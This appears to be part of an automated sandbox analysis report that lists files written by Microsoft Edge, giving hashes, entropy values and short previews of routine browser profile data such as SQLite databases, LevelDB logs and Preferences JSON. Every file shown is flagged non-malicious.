                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):415
                                                                                                                                                                                                                                                      Entropy (8bit):5.264576421525125
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:2i1kN4vdZYebvqBZFUt87i16Z/+7i1c5wZYebvqBaJ:bWNKbYebvyg8uIQgYebvL
                                                                                                                                                                                                                                                      MD5:4AD1CCF4D51840733F9A2DD998B1F6B4
                                                                                                                                                                                                                                                      SHA1:0D4AE7098FAC3298521F2E59371394F1ACC43B1E
                                                                                                                                                                                                                                                      SHA-256:A0B7F924AD45491E2FDC27BB6518ACAF3570494012C3F58225BB9CBE4474DAFA
                                                                                                                                                                                                                                                      SHA-512:71778128FC8BD45DC263BDA7B86A526B75D09F1BA72022E6254D15CF8AA03991551FC50EBE666C904804112A3A3A5C4C5851E52A3F5F360B3DBBD832BD4ED71D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:53.502 590 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/30-16:38:53.504 590 Recovering log #3.2024/11/30-16:38:53.506 590 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):415
                                                                                                                                                                                                                                                      Entropy (8bit):5.264576421525125
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:2i1kN4vdZYebvqBZFUt87i16Z/+7i1c5wZYebvqBaJ:bWNKbYebvyg8uIQgYebvL
                                                                                                                                                                                                                                                      MD5:4AD1CCF4D51840733F9A2DD998B1F6B4
                                                                                                                                                                                                                                                      SHA1:0D4AE7098FAC3298521F2E59371394F1ACC43B1E
                                                                                                                                                                                                                                                      SHA-256:A0B7F924AD45491E2FDC27BB6518ACAF3570494012C3F58225BB9CBE4474DAFA
                                                                                                                                                                                                                                                      SHA-512:71778128FC8BD45DC263BDA7B86A526B75D09F1BA72022E6254D15CF8AA03991551FC50EBE666C904804112A3A3A5C4C5851E52A3F5F360B3DBBD832BD4ED71D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:53.502 590 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/30-16:38:53.504 590 Recovering log #3.2024/11/30-16:38:53.506 590 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):321
                                                                                                                                                                                                                                                      Entropy (8bit):5.248377889241695
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1Hq2PFi23oH+TcwtpIFUt8YWi1tBZmw+YWi1tbkwOFi23oH+Tcwta/WLJ:2i1HvdZYebmFUt87i1tB/+7i1tb5wZYM
                                                                                                                                                                                                                                                      MD5:DB670D35E4ED90FF24F12E7D2B6B716F
                                                                                                                                                                                                                                                      SHA1:ECA8B41C39C57F048E5CCE0EFDAB08260843784E
                                                                                                                                                                                                                                                      SHA-256:1435539E12F3B74CE714294C7A92818591334CB18BC79DF3C746017502AD194C
                                                                                                                                                                                                                                                      SHA-512:EFA9AECE6E32F45079279094B518D0A0DF724DE4929096AF54019F1757058775D679205318CA85E3785AC2CC28B74D79CE62A9882FC67E49A7211848748C5572
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.616 4b0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/30-16:38:33.617 4b0 Recovering log #3.2024/11/30-16:38:33.617 4b0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):321
                                                                                                                                                                                                                                                      Entropy (8bit):5.248377889241695
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1Hq2PFi23oH+TcwtpIFUt8YWi1tBZmw+YWi1tbkwOFi23oH+Tcwta/WLJ:2i1HvdZYebmFUt87i1tB/+7i1tb5wZYM
                                                                                                                                                                                                                                                      MD5:DB670D35E4ED90FF24F12E7D2B6B716F
                                                                                                                                                                                                                                                      SHA1:ECA8B41C39C57F048E5CCE0EFDAB08260843784E
                                                                                                                                                                                                                                                      SHA-256:1435539E12F3B74CE714294C7A92818591334CB18BC79DF3C746017502AD194C
                                                                                                                                                                                                                                                      SHA-512:EFA9AECE6E32F45079279094B518D0A0DF724DE4929096AF54019F1757058775D679205318CA85E3785AC2CC28B74D79CE62A9882FC67E49A7211848748C5572
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.616 4b0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/30-16:38:33.617 4b0 Recovering log #3.2024/11/30-16:38:33.617 4b0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                      Entropy (8bit):1.2651993331889515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:KrJ/2qOB1nxCkMSSAELyKOMq+8wH0hLUZsrhVumSM:K0q+n0JS9ELyKOMq+8I0hAOX
                                                                                                                                                                                                                                                      MD5:A3CA45E6A70D4F87ACC41A02C662ABFD
                                                                                                                                                                                                                                                      SHA1:A6CEF9103534A2B007D9719BDA07E7760C794CB8
                                                                                                                                                                                                                                                      SHA-256:6EB5B0626555272E988C08BC0D44AC660FD6BEA033002E39AE274A47EE2F422D
                                                                                                                                                                                                                                                      SHA-512:0426C019639ACEE96113C35644DE1B1623A2BC8D16EA9B1C99BC754DE6A19E1EA61119299B8178156057053A2DB4A861BF8BB0EBE3659575F9D679CD53CEE835
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                      Entropy (8bit):0.46670076718242015
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0hitT:v7doKsKuKZKlZNmu46yjx0hqT
                                                                                                                                                                                                                                                      MD5:CB1232BA0FB330C05208838A29860852
                                                                                                                                                                                                                                                      SHA1:DCCBA2A16E523A80549BDA6E614772D967E2DFB7
                                                                                                                                                                                                                                                      SHA-256:14FAB792E19BEDB9B80889FAECC1BEBA2E4B674FBFB9C28B87FB4F65D119B031
                                                                                                                                                                                                                                                      SHA-512:20EE844D2CD8B93DC0BF70323B85EEF674767F1F4873EEAB054727CAFC3652CDBFDBC8EAABC5F8AC752FB0B1424F6FE037BA81922087416A275875D529D31438
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17395), with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17399
                                                                                                                                                                                                                                                      Entropy (8bit):5.4936342843326695
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:stAPGQSu4ksxTi4Xwh0zrBecbGaQwVbj9u:sWOXu2T5c2bGJY9u
                                                                                                                                                                                                                                                      MD5:1EAFFB2C34C236DB34E215FD89B6376D
                                                                                                                                                                                                                                                      SHA1:10626C5892D07EF13321003D2134250D61198AE9
                                                                                                                                                                                                                                                      SHA-256:5195DC35A528C7FD02265B818B75654DFDFE83D22106190BD55BD33E32D7496E
                                                                                                                                                                                                                                                      SHA-512:8D0C5D4B9F8B1FB3EF7DF091753CCAB19A9C11FDA40752B5BBE49F2557ADCD8192EDDB15CD28D61894F60C3A041185C56CC7B4147B679DB36E7A66118BCC3383
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11755
                                                                                                                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17230), with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17234
                                                                                                                                                                                                                                                      Entropy (8bit):5.497169256970003
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:stAPGQSu4ksxTi4Xwh0zrBecbGaQwVp9u:sWOXu2T5c2bGJk9u
                                                                                                                                                                                                                                                      MD5:F3E63BF7AD124BB6A966BE4113DC957B
                                                                                                                                                                                                                                                      SHA1:84BF6E9F1E2AC54F972E85D42772FCB2813F0AF6
                                                                                                                                                                                                                                                      SHA-256:1EF9ADBD3969863E4CC4CB43D4BCD855E02A9E82276332932C1684D536F58E46
                                                                                                                                                                                                                                                      SHA-512:EC60BEAFD9B7419A47D316971A87C03FD9651524880F8E8FF81FCB6255A75A519DAB7EFA65D7769869B73D2048BB05DA92391F66A9AC820BB43555614D12DA76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9682
                                                                                                                                                                                                                                                      Entropy (8bit):5.113435678009496
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:stAkdpqnsxTIlN6xykTE58mbV+Fw1QAxy93hPjYJ:stAQksxTi4UbGaQb9u
                                                                                                                                                                                                                                                      MD5:FB02E70C32E210331D2771F08B786041
                                                                                                                                                                                                                                                      SHA1:1EA75C858063782C4516655483D39A20466BA080
                                                                                                                                                                                                                                                      SHA-256:FD0503FF118E7B0B8EAEFC1CCC5E6C0F1DCE6C314FA313342C2534BAA59B7036
                                                                                                                                                                                                                                                      SHA-512:0057099ADB62F14E2A2A6692A85EB6E9A41B74CA48C3A804AAD0461A5FD9FB456B822DCD074C1138811E4222F029007A0D2FA81D894076BB31A1BD40C7975B76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24853
                                                                                                                                                                                                                                                      Entropy (8bit):5.5655482976743285
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:xhI9PEWP11fQj8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkdYb9OrwwpHtu3:xhI9PEWP11fQju1jah+b9LYt8
                                                                                                                                                                                                                                                      MD5:95A548804DEEDBC22575BCA8B70B7B5D
                                                                                                                                                                                                                                                      SHA1:A798F1E84992240BD9C149CC8E06650A98E36616
                                                                                                                                                                                                                                                      SHA-256:4F1B1A575DABBD4DCC517D2E7B37A0F853E041E2B3CBD571AD0E286B7079AC7F
                                                                                                                                                                                                                                                      SHA-512:123F11E7398DB638FEE5C4413CEDDF688640B012DADA1131478FE20C8E12E4DA25C13681CFAC3B3458E357CBF8B4D3AC400867F24A9A64290AD8ECA20FAEFE9B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377476313526291","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377476313526291","location":5,"ma
